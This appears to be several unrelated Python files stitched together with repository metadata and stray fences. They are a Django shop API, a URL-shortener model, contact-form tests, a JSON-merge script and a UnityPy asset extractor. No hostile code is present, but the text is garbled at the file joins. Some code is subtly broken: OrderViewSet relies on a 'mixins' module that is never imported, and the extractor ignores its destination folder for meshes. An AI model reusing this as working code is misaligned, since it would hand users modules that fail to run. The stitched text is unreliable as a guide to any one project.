from rest_framework.decorators import permission_classes
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.viewsets import ModelViewSet, GenericViewSet
from src.apps.shop.models.order import OrderCart, OrderCartItem
from src.apps.shop.serializers import (
OrderSerializer,
OrderItemSerializer,
CategoryRetrieveSerializer,
CategoryListSerializer,
ProductListSerializer,
ProductRetrieveSerializer,
OrderRetrieveSerializer,
)
from src.apps.shop.models import Product, Category
class ProductViewSet(ModelViewSet):
queryset = Product.objects.filter(is_active=True).prefetch_related("categories")
lookup_field = "slug"
http_method_names = ["get"]
serializer_classes = {
"list": ProductListSerializer,
"retrieve": ProductRetrieveSerializer,
}
def get_serializer_class(self):
return self.serializer_classes.get(self.action, ProductListSerializer)
class CategoryViewSet(ModelViewSet):
"""Category for products"""
queryset = Category.objects.all()
http_method_names = ["get"]
lookup_field = "slug"
pagination_class = None
serializer_classes = {
"list": CategoryListSerializer,
"retrieve": CategoryRetrieveSerializer,
}
def get_serializer_class(self):
return self.serializer_classes.get(self.action, CategoryListSerializer)
class OrderViewSet(mixins.CreateModelMixin, mixins.RetrieveModelMixin, GenericViewSet):
"""Viewsets order
```
{
"products": [{"product": int, "amount": int}, {"product": int, "amount": int}],
"prices": int,
"name": "str",
"phone": "str",
"address": "str",
"comments": "str"
}
```
"""
permission_classes = (AllowAny,)
queryset = OrderCart.objects.all()
http_method_names = ["post", "get"]
lookup_field = "order_number"
serializer_classes = {
"retrieve": OrderRetrieveSerializer,
"create": OrderSerializer,
}
def get_serializer_class(self):
return self.serializer_classes.get(self.action, OrderSerializer)
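# Usage sketch (the URL prefix depends on how the project's router registers this
# viewset, so the paths below are assumptions):
#   POST <prefix>/ with the JSON payload documented above creates an order;
#   GET <prefix>/<order_number>/ retrieves it, since lookup_field = "order_number".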
class OrderItemViewSet(ModelViewSet):
"""Viewsets order items"""
permission_classes = (AllowAny,)
serializer_class = OrderItemSerializer
queryset = OrderCartItem.objects.all()
http_method_names = ["post"]
```
#### File: apps/shorter/models.py
```python
from math import ceil
from uuid import uuid4
from django.conf import settings
from django.db import models
from django.utils.translation import gettext_lazy as _
def generate_short_code(length):
return "".join([uuid4().hex for _ in range(ceil(length / 32))])[:length]
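# e.g. generate_short_code(6) returns the first six hex characters of a uuid4,
# such as "9f3b2c" (illustrative value only).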
class UrlShorter(models.Model):
url = models.URLField(_("Url"), max_length=1024)
url_short = models.CharField(max_length=6, unique=True)
count = models.IntegerField(default=0)
is_expired = models.BooleanField(default=False)
created_at = models.DateTimeField(verbose_name=_("Created"), auto_now_add=True)
updated_at = models.DateTimeField(_("Updated at"), auto_now=True)
def __str__(self):
return str(self.url)
class Meta:
verbose_name = "Short Link"
verbose_name_plural = "Short Links"
ordering = ("-created_at",)
def get_url_short(self):
return f"{settings.SHORT_URL}/{self.url_short}"
def save(
self,
force_insert=False,
force_update=False,
using=None,
update_fields=None,
):
if not self.url_short:
self.url_short = generate_short_code(length=6)
        super().save(force_insert, force_update, using, update_fields)
```
#### File: src/tests/test_contacts.py
```python
import json
import pytest
@pytest.mark.django_db
@pytest.mark.urls("apps.contacts.urls")
def test_send_contacts_data(client):
data = {
"name": "hello",
"message": "world",
"phone_number": "88002000600",
"email": "<EMAIL>",
"company": "hello_world inc.",
}
assert (
client.post(
"/contacts/", data=json.dumps(data), content_type="application/json"
).status_code
== 201
)
@pytest.mark.django_db
@pytest.mark.urls("apps.contacts.urls")
def test_send_contacts_bad_data_email(client):
data = {
"name": "hello",
"message": "world",
"phone_number": "88002000600",
"email": "<EMAIL>",
"company": "hello_world inc.",
}
assert (
client.post(
"/contacts/", data=json.dumps(data), content_type="application/json"
).status_code
== 400
)
``` |
{
"source": "641i130/keygen",
"score": 3
} |
#### File: keygen/bin/json_merge.py
```python
import sys
import json
def read_json_file(fn):
with open(fn) as f:
return json.load(f)
combined = [read_json_file(fn) for fn in sys.argv[1:]]
print(json.dumps(combined))
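# Usage sketch (file names are placeholders):
#   python json_merge.py first.json second.json > merged.json
# prints the list of parsed JSON documents as a single JSON array on stdout.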
``` |
{
"source": "641i130/klbvfs",
"score": 3
} |
#### File: 641i130/klbvfs/extract.py
```python
import os
import UnityPy
from PIL import Image
def unpack_all_assets(source_folder : str, destination_folder : str):
# iterate over all files in source folder
for root, dirs, files in os.walk(source_folder):
for file_name in files:
# generate file_path
file_path = os.path.join(root, file_name)
# load that file via UnityPy.load
env = UnityPy.load(file_path)
# iterate over internal objects
for obj in env.objects:
# process specific object types
if obj.type.name in ["Texture2D", "Sprite"]:
# parse the object data
data = obj.read()
# create destination path
dest = os.path.join(destination_folder, data.name)
# make sure that the extension is correct
# you probably only want to do so with images/textures
dest, ext = os.path.splitext(dest)
dest = dest + ".png"
img = data.image
img.save(dest)
if obj.type.name == "TextAsset":
                    # export asset: data.script holds the raw bytes of the text asset
                    data = obj.read()
                    dest = os.path.join(destination_folder, data.name)
                    with open(dest, "wb") as f:
                        f.write(bytes(data.script))
                    # to write modified text back into the asset, assign new bytes
                    # to data.script and then call data.save()
if obj.type.name == "Mesh":
mesh : Mesh = obj.read()
with open(f"{mesh.name}.obj", "wt", newline = "") as f:
# newline = "" is important
f.write(mesh.export())
if obj.type.name == "Font":
font : Font = obj.read()
if font.m_FontData:
extension = ".ttf"
if font.m_FontData[0:4] == b"OTTO":
extension = ".otf"
                        with open(os.path.join(destination_folder, font.name + extension), "wb") as f:
f.write(font.m_FontData)
unpack_all_assets(".",".")
``` |